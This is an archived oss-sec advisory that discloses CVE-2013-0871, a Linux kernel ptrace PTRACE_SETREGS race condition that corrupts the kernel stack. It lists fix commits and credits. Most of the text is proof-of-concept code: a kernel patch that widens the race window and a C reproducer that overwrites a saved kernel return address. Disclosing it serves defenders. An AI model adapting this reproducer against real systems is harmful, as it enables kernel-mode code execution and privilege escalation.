oss-sec mailing list archives



Linux kernel race condition with PTRACE_SETREGS (CVE-2013-0871)

Linux kernel stack corruption due to race condition with PTRACE_SETREGS ----------------------------------------------------------------------- A race conditon in ptrace can lead to kernel stack corruption and arbitrary kernel-mode code execution. This should be tracked as CVE-2013-0871. Solution ------------ The following commits from Oleg Nesterov should address the issue: - 910ffdb18a6408e14febbb6e4b6840fd2c928c82 - 9899d11f654474d2d54ea52ceaa2a1f4db3abd68 - 9067ac85d533651b98c2ff903182a20cbb361fcb Credit --------- This was discovered by Suleiman Souhlal and Salman Qazi of Google, with help from Aaron Durbin and Michael Davidson, also of Google. Code -------- Salman Qazi provided the following PoC code: Kernel patch for easy reproduction: diff --git a/arch/x86/kernel/ptrace.c b/arch/x86/kernel/ptrace.c index b629bbe..e22617e 100644 --- a/arch/x86/kernel/ptrace.c +++ b/arch/x86/kernel/ptrace.c @@ -24,6 +24,7 @@ #include <linux/rcupdate.h> #include <linux/module.h> #include <linux/context_tracking.h> +#include <linux/delay.h> #include <asm/uaccess.h> #include <asm/pgtable.h> @@ -902,6 +903,12 @@ long arch_ptrace(struct task_struct *child, long request, datap); case PTRACE_SETREGS: /* Set all gp regs in the child. */ + if (!strcmp(current->comm, "ptrace_death")) { + int i; + WARN_ON_ONCE(1); + for (i = 0 ; i < 15; i++) + mdelay(10); + } return copy_regset_from_user(child, task_user_regset_view(current), REGSET_GENERAL, source code for ptrace_death: /* * Repro case for SETREGS arbitrary ring zero execution bug. * * The specific scenario that we attempt to create: * * V does a syscall. It is being traced by P. P * upon stopping V with PTRACE_SYSCALL and waiting for it, proceeds * to read its registers. At this time P is asleep and an RT process S * starts running. * * Then P proceeds to write V's registers, at shortly it has done this * another process K kills V. Process S goes to sleep permitting V * space to run. V wakes up from its waiting state and heads for the exit. * But, S quickly wakes up again by the time V has reached schedule(). V * is no longer running (since S has the CPU) * and P modifies its regs. When V finally starts running * and returns from schedule(), it pops an incorrect value from the * stack. The reason is that the stack on which schedule() is called * does not have the final 6 registers in pt_regs on it. That means that * when P modifies V's registers, it is actually overwriting the stack * frame saved for schedule(), including the return RIP. * * V and S and pinned to CPU 0. S is an RT task so that it can control * when V does and doesn't run. * remaining processes are not allowed on 0. * */ #include <sched.h> #include <sys/ptrace.h> #include <sys/user.h> #include <stdlib.h> #include <stdio.h> #include <assert.h> #include <signal.h> /* S */ int nuke_cpu(void) { int pid0; int i; unsigned long mask = 1; pid0 = fork(); if (!pid0) { struct sched_param p = {}; p.sched_priority = sched_get_priority_min(SCHED_FIFO); assert(!sched_setscheduler(0, SCHED_FIFO, &p)); assert(!sched_setaffinity(0, sizeof(mask), &mask)); i = 0; usleep(120000); while(1) { if (i == 50000) { usleep(10); printf("x"); fflush(stdout); } i++; } } return pid0; } int once() { long i; int pid0; int pid; unsigned long mask = 1; struct user_regs_struct regs; assert(!sched_setaffinity(0, sizeof(mask), &mask)); pid = fork(); if (!pid) { /* V */ while (1) { /* Put our chosen RIP in callee saved registers */ asm __volatile__ ( "mov $0x1eadbeef, %%rbx

" "mov $0x1eadbeef, %%rbp

" "mov $0x1eadbeef, %%r12

" "mov $0x1eadbeef, %%r13

" "mov $0x1eadbeef, %%r14

" "mov $0x1eadbeef, %%r15

" "mov $0, %%rsi

" "mov $0, %%rdi

" "mov $0x6d, %%rax

" "syscall":::"rax","rsi","rdi", "r12", "rbx"); } } else { /* P */ assert(!ptrace(PTRACE_ATTACH, pid, 0, 0)); wait(NULL); assert(!ptrace(PTRACE_SETOPTIONS, pid, NULL, PTRACE_O_TRACESYSGOOD | PTRACE_O_TRACEFORK | PTRACE_O_TRACEVFORK | PTRACE_O_TRACECLONE)); while(1) { int nuke_pid; int pid2; mask = 0xfffe; assert(!sched_setaffinity(0, sizeof(mask), &mask)); /*Entry */ assert(!ptrace(PTRACE_SYSCALL, pid, NULL, 0, 0)); wait(NULL); assert(!ptrace(PTRACE_GETREGS, pid, NULL, ®s)); nuke_pid = nuke_cpu(); regs.orig_rax = 0x3c; pid2 = fork(); if (!pid2) { /* K */ usleep(120000); kill(pid, SIGKILL); printf("."); fflush(stdout); exit(0); } printf("{"); fflush(stdout); if (!ptrace(PTRACE_SETREGS, pid, NULL, ®s)) { printf("+"); } else { printf("-"); } ptrace(PTRACE_CONT, pid, NULL, 0, SIGKILL); kill(pid, SIGKILL); kill(pid2, SIGKILL); kill(nuke_pid, SIGKILL); exit(0); } } } int main(void) { while (1) { int pid = fork(); if (!pid) { once(); } wait(NULL); } }

By Date By Thread

Current thread: